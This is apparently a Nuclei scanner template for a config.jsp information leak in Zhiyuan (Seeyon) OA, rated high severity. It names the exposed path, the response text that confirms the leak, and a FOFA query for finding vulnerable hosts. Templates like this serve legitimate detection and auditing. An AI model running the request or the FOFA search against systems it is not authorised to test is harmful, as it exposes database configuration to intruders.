id: zhiyuan-oa-config-leak

info:
  name: config.jsp 敏感信息泄漏漏洞
  author: xiaohe
  severity: high
  description: config.jsp 敏感信息泄漏漏洞
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzIwMDcyNzM0Mw==&mid=2247485029&idx=1&sn=1bbe24fd063d75e35a4d24db5e8edd0f
  metadata:
    verified: true
    fofa: body="yyoa" && app="致远互联-OA""
  tags: zhiyuan,leak

requests:
  - method: GET
    path:
      - "{{BaseURL}}/yyoa/ext/trafaxserver/SystemManage/config.jsp"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '数据库连接正常'
      
      - type: status
        status:
          - 200